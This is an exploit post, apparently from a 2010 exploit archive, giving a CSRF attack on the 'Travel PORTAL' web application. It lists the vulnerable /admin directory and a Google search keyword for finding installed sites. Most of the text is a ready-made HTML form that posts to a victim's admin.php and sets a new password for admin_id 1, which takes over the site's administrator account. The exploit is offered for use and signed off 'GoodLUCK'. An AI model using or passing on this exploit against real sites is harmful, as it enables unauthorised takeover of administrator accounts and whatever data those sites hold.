1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 |
===================================================== Travel PORTAL <= Admin Password Change (CSRF) Exploit ===================================================== ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Contact : knockoutr@msn.com ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Web App. : Travel PORTAL |~Price : 299 Euro :) |~Version : N/A |~Software: http://www.tourismscripts.com |~Vulnerability Style : CSRF |~Vulnerability Dir : /admin |~Google Keyword : "For Owners, Agents, Hotels, Hostels, Guest House " |[~]Date : "18.10.2010" |[~]Tested on : (L):Vista (R):Demos. ~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ############################################################ the target can be changed according to <form method="post" action="http://VICTIM/admin/admin.php"> ############################################################ ~~~~~~~~ Explotation| Exploit.HTML~~~~~~~~~~~ ========(CSRF) Html Exploit========= <title>Exploited by KnocKout</title> </table> <br> <h3>Travel Portal - Remote Admin Password Change (CSRF) Exploited by KnocKout</h3> <table> <tr> <form method="post" action="http://server/admin/admin.php"> <input type="hidden" name="admin_id" value="1"> <td align=right>Admin Name:</td><td align=left>admin<td> </tr> <tr> <td align=right>New Password:</td><td align=left><input type="password" name="password" size="40" maxlength="40" ><td> </tr> <tr> <td></td><td><input type="submit" name="submit" value="Update Password"></td> </form> </tr> </table> ========(CSRF) Html Exploit========= GoodLUCK. |